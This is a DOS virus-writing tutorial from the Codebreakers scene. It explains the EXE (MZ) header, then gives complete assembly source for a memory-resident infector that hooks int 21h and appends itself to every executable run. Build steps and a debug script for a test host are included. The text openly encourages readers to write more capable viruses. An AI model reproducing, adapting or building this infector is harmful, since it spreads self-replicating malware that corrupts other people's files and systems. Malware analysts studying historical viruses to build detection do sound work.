Lesson 4
Guide To EXE Infection
By Horny Toad

Now onto the 4th lesson, EXE file infection. Boy, the topics never seem to get any easier, do they? The difficult aspect of EXE infection is that there is no ONE technique to cover all forms of EXE infection. I will, therefore, keep to the basics in this tutorial and, in later articles, address different techniques which you can use.

What is an EXE file?
---------------------

One of the first things that we need to do is understand what an EXE file is and, more importantly, what it looks like. Quite simply, an EXE file is an improvement over the COM file format in that it allows the program size to exceed one segment (64K). COM programs are limited to 64K, including 256 bytes for the PSP. EXE files, on the other hand, can occupy a much larger space by using more than one segment. The limit on an EXE file's size is the amount of memory/hard drive space you have.

There are other characteristics that differ between the EXE and COM formats. In a COM file, the stack is automatically defined, whereas in an EXE file you need to initialize it yourself. The stack is probably the single most difficult concept to grasp when writing EXE files. Care must be taken that you define the stack large enough to handle all of the push and pop instructions that your program will use. If your stack is too small, your program is sure to crash.

The next difference between the two file formats is the initializing of the data segment. In a COM file, the data segment is defined as an area within the code segment. Since a COM file only uses one segment anyway, the data, code, and stack segments can all fall right together. Very convenient, right? Well, in an EXE file, after the program loader puts the file in memory, both DS and ES contain the address of the PSP! Remember that! Always remember to load the address of the data segment into DS when coding EXE files.

At the heart of the EXE file format lies the EXE header.
The EXE header is a minimum of 32 bytes and describes a multitude of information about how the program needs to be loaded. The reason I say that the header is the heart of the EXE file format is that a virus which attacks EXE files needs to utilize practically all of the information in the header. Therefore, pay attention so that you thoroughly understand this concept. Let's take a look at the EXE header format:

The length of each element in the EXE header is 2 bytes (1 WORD). The descriptive names of each element in the header are the traditional names that have been used since the EXE file format was created. You can give them whatever symbolic name you want to in your virus.

                          EXE Header Format

Offset  Length  Content   Description
-----------------------------------------------------------------------
0h      2       4Dh 5Ah   EXE file signature "MZ"
2h      2       PartPag   Number of bytes in the last page
4h      2       PagCnt    Length of file in 512-byte pages
6h      2       ReloCnt   Number of elements in the relocation table
8h      2       HdrSize   Header length in paragraphs
0Ah     2       MinMem    Minimum additional memory required, in paragraphs
0Ch     2       MaxMem    Maximum additional memory required, in paragraphs
0Eh     2       ReloSS    Segment correction for stack (SS)
10h     2       ExeSP     Value of stack pointer (SP)
12h     2       ChkSum    Checksum
14h     2       ExeIP     Value of instruction pointer (IP)
16h     2       ReloCS    Segment correction for CS
18h     2       TablOff   Offset of the first relocation element
1Ah     2       Overlay   Overlay number

That looks very pretty, but how does it actually look? To tell you the truth, looking at the EXE header in DEBUG makes it look much simpler. The only catch is that you need to rename the extension to something other than ".EXE" in order to view the header. You can, if you know the exact program address, use the DEBUG L command to load a certain sector from a disk and then (D)isplay the contents of the sector. Nahh! Too complicated. Just rename the damn thing. Make sure that you have read Horny Toad & Opic's guide to disassembly and understand how to use DEBUG.
I have included some sample files in this tutorial to give you some hands-on work with EXE files. One of the samples is a basic do-nothing EXE file. Let's say that I called this file someExe.exe. Below, I will display the contents of the someExe header. At a prompt, type:

c:\>debug someExe.eww
-d

??:0100  4D 5A 11 00 02 00 01 00-20 00 11 00 FF FF 02 00   MZ...... .......
??:0110  00 01 00 00 00 00 00 00-3E 00 00 00 01 00 FB 71   ........>......q
??:0120  6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00   jr..............

For an easier-to-read version of the same information, use SPo0ky's EXE header reader for the following results:

EXE Signature ........................................ MZ
Size of Last Page .................................... 0011
Number of 512 byte pages in file ..................... 0002
Number of Relocation Entries ......................... 0001
Header size in Paragraphs ............................ 0020
Minimum additional Memory required in paragraphs ..... 0011
Maximum additional Memory required in paragraphs ..... FFFF
Initial SS relative to start of file ................. 0002
Initial SP ........................................... 0100
Checksum (unused) .................................... 0000
Initial IP ........................................... 0000
Initial CS relative to start of file ................. 0000
Offset within Header of Relocation Table ............. 003E
Overlay Number ....................................... 0000

Relocation Table Entries:
0000:0001

However you choose to read the EXE header is fine. At this point, just make sure that you are aware of its existence. I have begun including the debug scripts of the programs that I use in the tutorial so that people who do not have access to the Codebreakers magazine can extract all of the sample programs from the tutorial with the help of debug. The debug usage differs slightly from the other tutorials, so make sure you read the instructions at the end of this file.
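
If you would rather not squint at a hex dump, the same header words can be decoded with a few lines of Python. This is only a minimal sketch for reading a header, not part of the original tutorial's tools: the helper name parse_mz_header is made up for illustration, the field names are the ones from the header table, and the sample bytes are the first 1Ch bytes of the DEBUG dump for the do-nothing sample file.

```python
import struct

# Field names follow the header table in this tutorial. The helper name
# parse_mz_header is hypothetical and used only for illustration.
FIELDS = ("Signature", "PartPag", "PagCnt", "ReloCnt", "HdrSize",
          "MinMem", "MaxMem", "ReloSS", "ExeSP", "ChkSum",
          "ExeIP", "ReloCS", "TablOff", "Overlay")


def parse_mz_header(data):
    """Decode the first 1Ch bytes of an EXE file into a dict of words."""
    if len(data) < 0x1C:
        raise ValueError("need at least 28 bytes of header")
    # Fourteen consecutive 16-bit little-endian words.
    words = struct.unpack("<14H", data[:0x1C])
    header = dict(zip(FIELDS, words))
    # Bytes 4Dh 5Ah ("MZ") read as the word 5A4Dh; "ZM" reads as 4D5Ah.
    if header["Signature"] not in (0x5A4D, 0x4D5A):
        raise ValueError("not an EXE header")
    return header


# First 28 bytes of the DEBUG dump of the sample file.
SAMPLE = bytes.fromhex(
    "4D5A110002000100" "20001100FFFF0200"
    "0001000000000000" "3E000000"
)

if __name__ == "__main__":
    for name, value in parse_mz_header(SAMPLE).items():
        print(f"{name:<10}{value:04X}")
```

Each printed value should line up with the corresponding line of the header reader listing, for example PartPag 0011, HdrSize 0020 and TablOff 003E. To run it against a real file instead of the pasted bytes, pass the first 28 bytes read from the file in binary mode.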
Now, let's take a look at the individual contants of the EXE header and identify their function in the infection process. EXE signature ------------- The first word in the header is the traditional EXE file signature "MZ". These are the initials of Mark Zbikowski, the programmer who designed the EXE file format. Obviously, you already know from my last tutorial that you can use this unique signature to identify whether or not the file is of the EXE format. PartPag and PagCnt (need to be modified) ------------------ PartPag and PagCnt make up the entire file size including header. PageCnt, as the name implies, is the length of the file expressed in 512 byte pages. PartPag is the amount of bytes that are on the last page of PageCnt. PartPag is expressed as length of the file mod 512. Mod. You better learn this concept now, because it will follow you on into higher programming languages such as C++. 5 % 2 = 1 5 / 2 = 2 The mod (%) is the remainder left over after division has taken place in non-floating point numbers. Simple enough. PartPag and PagCnt will need to be modified to allow for the inclusion of you virus code. ReloCnt ------- The next item in the header represents the number of items in the relocation table. What the hell is a relocation table? A relocation table contains two words (offset,segment) for each element in the program that needs to be adjusted to account for segment location. You can skip over this because you will not have to make any modifications here but... In the relocation table, both words are read and a relative segment address is computed by the sum of the loading segment address (usually PSP seg + 10h) and the segment address to the element that needs adjusting. The loading segment is then added to the element in memory at the relative segment address/offset. HdrSize ------- The next element of the header is the header size. Quite self explanatory, the HdrSize holds the size of the header in 16-byte paragraphs. 
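
The page and paragraph arithmetic described above is easy to check by hand, or with a short Python sketch like the one below. It only reads values; the function names file_size and header_size are made up for illustration. One assumption worth stating loudly: by the usual convention for this header, a PartPag of zero means the last page is completely full, so that case is handled separately.

```python
PAGE = 512       # bytes per page, the unit of PagCnt
PARAGRAPH = 16   # bytes per paragraph, the unit of HdrSize


def file_size(pag_cnt, part_pag):
    """Total file size in bytes (header included) from PagCnt and PartPag."""
    if part_pag == 0:
        # Assumed convention: zero means the last page is a full 512 bytes.
        return pag_cnt * PAGE
    # All pages but the last are full; the last holds part_pag bytes.
    return (pag_cnt - 1) * PAGE + part_pag


def header_size(hdr_size):
    """Header length in bytes from HdrSize (given in paragraphs)."""
    return hdr_size * PARAGRAPH


if __name__ == "__main__":
    print(5 % 2, 5 // 2)                  # remainder and integer quotient
    total = file_size(0x0002, 0x0011)     # values from the sample header
    print(total, hex(total))
    print(header_size(0x0020))
    print(total - header_size(0x0020))    # bytes left after the header
```

With the sample header values (PagCnt 0002, PartPag 0011, HdrSize 0020) this gives a file size of 529 bytes (211h), a 512-byte header, and 17 bytes of program after the header, which agrees with the length written by the debug script at the end of this file.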
With the information that you have thus far seen, you can determine the actual bare program size with the equation: Size=((PagCnt*512)-(HdrSize*16))-(512-PartPag) You will also not have to fool with the header size. MinMem & MaxMem --------------- Shall we also have another obvious two contents: MinMem and MaxMem? These two values are used to allocate the amount of memory for the program. ReloSS & ExeSP (need to be modified) -------------- ReloSS and ExeSP are two items that need to be changed to account for the addition of code that you have just appended. ReloSS added with the starting segment address will give you your SS register. Checksum (should be modified) -------- The Checksum item is the traditional place to store an infection marker. ReloCS & ExeIP (need to be modified) -------------- ReloCS is definitely an important item. The item stored here, along with the ExeIP, represents the beginning address to our virus code. This value will be initially saved from the host program so that it can be recalled and control returned back to the host. TablOff -------- This is the offset to the first relocation element in the file. Overlay ------- If this is the program main module, the value should be zero. Below is a simple resident EXE infector. I choose to include a resident virus rather then a direct action infector, because I believe that, if you can write a resident EXE infector, making it non-resident would be a piece of cake. One thing that I was considering to do was to follow the modular style of coding that I used in the last tutorial. One trend that I was seeing in many viruses was that people were simply copying the code. After Slam #4 was released, you have no idea how many EXE infectors started to hit the scene that were essentially a word for word copy. Whatever. In the end, I decided to include the virus below so that you can see everything working in one virus, rather than the modular style of instruction. 
I am not sure which way is better, so I will probably continue to switch back and forth between styles. Another thing, while I am in the preaching mode, from now on, I will not be explaining the most basic concepts of assembly. If you have been following along with the tutorials, you should understand every concept that is in this tutorial. Really, the only new aspect that you need to be aware of with EXE infection is that you need to change certain values in the header to accomodate your virus. You already know how to do this. In the beginning tutorials, you played around with elements of the DTA. Well, you are going to be doing the same thing with the header, reading it into a buffer and reading and modifying the values that I have pointed out above. .286 virus segment assume cs:virus, ds:virus, es:virus jumps org 0CBh start: call delta ;Calculate delta offset delta: pop bp sub bp,offset delta push ds ;save PSP address push cs cs pop ds es mov ax,0CBCBh ;our "Codebreaker" residency check int 21h ;>what is CB? cmp bx,0C001h ;>C001!! 
:o) je restore ;its already resident pop ds push ds ;PSP address back into DS ;-------------------------------------------------- mov ax,ds ;MCB residency dec ax ;For further clarification mov ds,ax ;read Codebreaker Tutorial 3 sub word ptr ds:[3],40h sub word ptr ds:[12h],40h xor ax,ax mov ds,ax dec word ptr ds:[413h] mov ax,word ptr ds:[413h] shl ax,6 mov es,ax push cs pop ds lea si,[bp+start] xor di,di mov cx,the_end - start rep movsb ;-------------------------------------------------- xor ax,ax ;Setting of interrupts mov ds,ax ;For further clarification ;read Codebreaker Tutorial 3 mov ax,es mov bx,new_int21h-start cli xchg bx,word ptr ds:[21h*4] xchg ax,word ptr ds:[21h*4+2] mov word ptr es:[old_int21h-start],bx mov word ptr es:[old_int21h+2-start],ax sti ;-------------------------------------------------- push cs cs pop ds es mov ah,9 ;Warns the poor shmuck lea dx,[bp+message] int 21h restore: ;Control handed back lea si,[bp+old_ip] ;Restore orig IP lea di,[bp+original_ip] mov cx,4 rep movsw ; Now for a clarification of the next four lines. At the beginning of ; the virus DS contains the address of the PSP. We now restore the ; address from the stack, place the address in ES. Then add 10h to ; skip over the PSP. Skip over the PSP(100h) with 10h? Sounds a little ; fishy, right? Well, remember that when you add 10h to AX, you are ; adding 10h segments. Each segment is 10h bytes, so 10h*10h=100h (PSP) pop ds mov ax,ds mov es,ax add ax,10h add word ptr cs:[bp+original_cs],ax ;Orig CS cli add ax,word ptr cs:[bp+original_ss] ;Orig SS mov ss,ax mov sp,word ptr cs:[bp+original_sp] ;Orig SP sti db 0eah ;jump to to it original_ip dw ? ; original_cs dw ? original_ss dw ? original_sp dw ? 
new_int21h: ;our int 21h handler pushf ;push the flags cmp ax,0CBCBh ;residency check jne no_install_check mov bx,0C001h ;already resident popf ;restore all flags iret ;return no_install_check: cmp ah,4bh ;check if execute je infect return: popf ;restore all flags db 0eah ;jmp to orig int 21h old_int21h dd ? infect: pusha ;only 286, saves all gen reg push ds push es call tsr_delta tsr_delta: pop bp ;a tsr delta offset %-) sub bp,offset tsr_delta mov ax,3d02h ;open file in DS:DX int 21h jc exit xchg ax,bx ;file handle to bx push cs cs pop ds es mov ah,3fh ;Read the target header lea dx,[bp+header] ;into our buffer mov cx,1ch int 21h cmp word ptr cs:[bp+header],'ZM' ;check if its an EXE je ok cmp word ptr cs:[bp+header],'MZ' je ok jmp close ok: cmp word ptr cs:[bp+header+12h],'BC' ;Checksum value checked for je close ;previous infection mov word ptr cs:[bp+header+12h],'BC' ;Mark it as infected mov ax,word ptr cs:[bp+header+14h] ;Save orig ExeIP mov word ptr cs:[bp+old_ip],ax ;Store in our buffer mov ax,word ptr cs:[bp+header+16h] ;Save orig ReloCS mov word ptr cs:[bp+old_cs],ax mov ax,word ptr cs:[bp+header+0eh] ;Save orig ReloSS mov word ptr cs:[bp+old_ss],ax mov ax,word ptr cs:[bp+header+10h] ;Save orig ExeSP mov word ptr cs:[bp+old_sp],ax mov ax,4202h ;Set pointer to end of file xor cx,cx xor dx,dx int 21h push ax dx ;Save EOF results ;Calculate new CS:IP, we set ;it to the EOF (this is where ;we will attach our virus) mov cx,16 ;Convert filesize into 16 byte div cx ;paragraphs sub ax,word ptr cs:[bp+header+8] ;Substract Header size from ;filesize to get the image ;(code/data) size. 
;save: mov word ptr cs:[bp+header+14h],dx ;New ExeIP mov word ptr cs:[bp+header+16h],ax ;New ReloCS pop dx ax ;restore saved filesize add ax,the_end - start ;Add virus size to file size adc dx,0 ;Adds carry to DX mov cx,512 ;Calculate amount of pages div cx cmp dx,0 je no_remainder inc ax ;if remainder, add 1 no_remainder: mov word ptr cs:[bp+header+4],ax ;New PageCnt mov word ptr cs:[bp+header+2],dx ;New PartPag mov ah,40h ;write the virus to the EOF lea dx,[bp+start] mov cx,the_end - start int 21h mov ax,4200h ;Send pointer to beginning xor cx,cx xor dx,dx int 21h mov ah,40h ;Write the new header lea dx,[bp+header] mov cx,1ch int 21h mov al,7 int 29h ; just a BEEEEEPPP close: mov ah,3eh ;close file int 21h exit: pop es pop ds popa jmp return old_ip dw offset exit_prog old_cs dw 0 old_ss dw 0 old_sp dw 0fffeh header db 1ch dup(?) ;Buffer for header message db 10,13,10,13 db '- SPo0ky''s EXAMPLE TSR EXE infector for Horny Toad''s ''Guide To EXE Infection'' -',10,13 db '- has been installed in your computers memory and will from now on infect any -',10,13 db '- EXE file that you execute. -',10,13 db '- You can use TBCLEAN (www.thunderbyte.com) to clean this virus. -',10,13,10,13 db ' - www.codebreakers.org -',10,13,'$' the_end: exit_prog: mov ax,4c00h ;Request terminate program int 21h virus ends end start In order to see the above virus work. Cut the virus out of this file and save it in a file exevir.asm. At a prompt with TASM/TLINK in the same directory, type: c:\>tasm exevir.asm c:\>tlink exevir.obj Use the myexe.exe (below) as the host program. With both of the programs in the same directory, execute the virus, then execute the host program. If you look at the filesize using the (dir)ectory command, you will see that it has increased in length. Test this virus in a MSDOS box from windows and when you exit out of the MSDOS box, the virus will be gone. If you check the header now, you will be able to see the changes made after infection. 
Take a look at that beautiful "CB" infection marker. ??:0100 4D 5A 5A 01 03 00 01 00-20 00 11 00 FF FF 02 00 MZZ..... ....... ??:0110 00 01 43 42 01 00 01 00-3E 00 00 00 01 00 FB 71 ..CB....>......q ??:0120 6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00 jr.............. To write the definitive guide to all forms of EXE infection, I would need to quit my day job (which I've thought of doing) and just write a book. In the end it is better to have a bunch of installments attacking each issue and facet of virus writing. Look for the future Codebreaker tutorials become much more specific and advanced. If you can understand how to infect COM and EXE files, along with what role encryption and polymorphism can aid in virus effectivness, you are well on you way to making some really awesome creations. The only thing that you need to add from here is some boot infection techniques to the virus and watch out, you'll have a decent multipartide virus. I guess my one piece of advice now is to read code and absorb it. Start to become critical of others code and use that knowledge and judgement to develope your own style. Enough preaching! Have fun! Good luck! Horny Toad SAMPLE PROGRAMS USED IN TUTORIAL -------------------------------- In order to extract this sample program, cut it out of this file and paste it into a file named "myexe.txt". At the prompt, type: c:\>debug < myexe.txt c:\>rename myexe.exd myexe.exe You will then have a sample infectable EXE file. 
N MYEXE.EXD E 0100 4D 5A 11 00 02 00 01 00 20 00 11 00 FF FF 02 00 E 0110 00 01 00 00 00 00 00 00 3E 00 00 00 01 00 FB 71 E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0300 B8 01 00 8E D8 8E C0 B4 4C A0 00 00 CD 21 00 00 E 0310 00 RCX 0211 W Q